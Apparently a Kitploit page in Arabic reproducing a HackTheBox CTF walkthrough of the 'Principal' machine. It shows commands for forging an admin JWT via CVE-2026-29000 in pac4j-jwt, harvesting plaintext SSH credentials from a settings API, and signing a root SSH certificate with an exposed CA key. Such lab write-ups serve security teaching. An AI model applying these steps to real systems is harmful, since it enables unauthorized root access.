Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Principal-HackTheBox — شرح تفصيلي لاستغلال CVE-2026-29000 في pac4j-jwt لتجاوز المصادقة، واستخراج بيانات الاعتماد من إعدادات API، وتصعيد الامتيازات عبر توقيع SSH CA على جهاز Linux من HackTheBox. | Kitploit
أدوات/GitHubGitHub/ledksv/principal-hackthebox
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالأمن الويبالتشفيرCTFاختبار الاختراقالمصادقة
GitHubledksv/principal-hackthebox

Principal-HackTheBox

شرح تفصيلي لاستغلال CVE-2026-29000 في pac4j-jwt لتجاوز المصادقة، واستخراج بيانات الاعتماد من إعدادات API، وتصعيد الامتيازات عبر توقيع SSH CA على جهاز Linux من HackTheBox.

عرض المستودع
منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

HackTheBox — Principal

الصعوبة: متوسط نظام التشغيل: Linux المنصة: HackTheBox


نظرة عامة

تطبيق ويب يعمل بإصدار pac4j-jwt v6.0.3 — وهو عرضة لثغرة CVE-2026-29000. مفتاح RSA العام مكشوف بدون مصادقة عبر نقطة نهاية JWKS ويمكن استخدامه لتزوير رمز JWE إداري صالح، متجاوزًا المصادقة بالكامل. مع الوصول الإداري، يتم استرداد بيانات اعتماد SSH النصية الصريحة من واجهة برمجة تطبيقات الإعدادات. حساب الخدمة عضو في مجموعة deployers مع صلاحية قراءة لمفتاح خاص لمرجع مصدق SSH موثوق به من قبل sshd — توقيع شهادة تمنح وصول الجذر يكمل الجهاز.


1. الاستطلاع

تصفحت تطبيق الويب وعاينت شفرة الصفحة المصدرية. وجدت حزمة JavaScript الرئيسية في /static/js/app.js.

نقاط نهاية API الرئيسية المحددة داخل app.js:

root@kitploit:~
/api/auth/login
/api/auth/jwks      <- نقطة نهاية المفتاح العام (بدون مصادقة)
/api/dashboard
/api/users
/api/settings

كشف تذييل الصفحة عن: pac4j-jwt v6.0.3 — عرضة لثغرة CVE-2026-29000.


2. تجاوز مصادقة JWT — CVE-2026-29000

جلبت مفتاح RSA العام من نقطة نهاية JWKS غير المصادق عليها:

root@kitploit:~
curl http://<TARGET_IP>:8080/api/auth/jwks
# يُرجع مفتاح RSA العام (kid: enc-key-1)

تسمح ثغرة CVE-2026-29000 باستخدام المفتاح العام لتزوير رمز JWE صالح — المكتبة تقبل بشكل غير صحيح الرموز المشفرة بالمفتاح العام بدلاً من اشتراط المفتاح الخاص.

استخدمت إثبات المفهوم (PoC) لتوليد رمز إداري مزور:

root@kitploit:~
python3 poc.py \
  --jwks http://<TARGET_IP>:8080/api/auth/jwks \
  --user admin \
  --role ROLE_ADMIN

3. الوصول إلى واجهة برمجة تطبيقات الإدارة

استخدمت الرمز المزور كرمز Bearer في Burp Repeater:

root@kitploit:~
Authorization: Bearer <forged_token>

GET /api/dashboard ← 200 OK

  • تأكيد الدور: ROLE_ADMIN
  • أظهر سجل النشاط إجراءات CERT_ISSUED للمستخدم: svc-deploy

GET /api/settings ← 200 OK

  • تم العثور على بيانات اعتماد SSH بنص صريح في تكوين الأمان
  • تم تفعيل مصادقة شهادة SSH
  • مسار مرجع مصادقة SSH: /opt/principal/ssh/

4. الوصول الأولي

دخلت عبر SSH باستخدام بيانات الاعتماد المستردة من /api/settings:

root@kitploit:~
ssh svc-deploy@<TARGET_IP>

تم استرداد علم المستخدم.


5. تصعيد الامتيازات — توقيع مرجع مصادقة SSH

svc-deploy عضو في مجموعة deployers مع صلاحية قراءة لـ /opt/principal/ssh/:

root@kitploit:~
ls -la /opt/principal/ssh/
# ca        — مفتاح خاص لمرجع مصادقة RSA 4096-bit (قابل للقراءة من قبل deployers)
# ca.pub    — المفتاح العام لمرجع المصادقة
# README.txt — يؤكد أن مرجع المصادقة موثوق به من قبل sshd

المفتاح الخاص لمرجع المصادقة قابل للقراءة. بما أن sshd يثق بهذا المرجع، فإن أي شهادة موقعة منه مقبولة — بما في ذلك شهادة تمنح وصول الجذر.

root@kitploit:~
# توليد زوج مفاتيح جديد
ssh-keygen -t ed25519 -f /tmp/privesc

# التوقيع مع مرجع المصادقة، بمنح principal 'root'
ssh-keygen -s /opt/principal/ssh/ca -I pwned -n root -V +1h /tmp/privesc.pub

# الدخول عبر SSH كجذر
ssh -i /tmp/privesc root@<TARGET_IP>

تم استرداد علم الجذر.


الأعلام

  • المستخدم: /home/svc-deploy/user.txt
  • الجذر: /root/root.txt

الدروس المستفادة الرئيسية

  • تحقق دائمًا من إصدارات مكتبات JWT أثناء استطلاع تطبيقات الويب — pac4j-jwt شائع في تطبيقات Java.
  • CVE-2026-29000: ارتباك مفتاح JWE في pac4j — يتم قبول المفتاح العام حيث يُشترط المفتاح الخاص.
  • غالبًا ما تسرب نقاط نهاية إعدادات API بيانات الاعتماد بنص صريح — قم دائمًا بتعداد جميع المسارات المصادق عليها بمجرد حصولك على رمز صالح.
  • إذا كان حساب الخدمة قادرًا على قراءة مفتاح خاص لمرجع مصادقة SSH موثوق به من قبل sshd، يمكنك توقيع شهادة كأي principal بما في ذلك الجذر. تحقق من عضويات المجموعات وصلاحيات مفتاح مرجع المصادقة أثناء مرحلة ما بعد الاستغلال.
تنزيل الأداة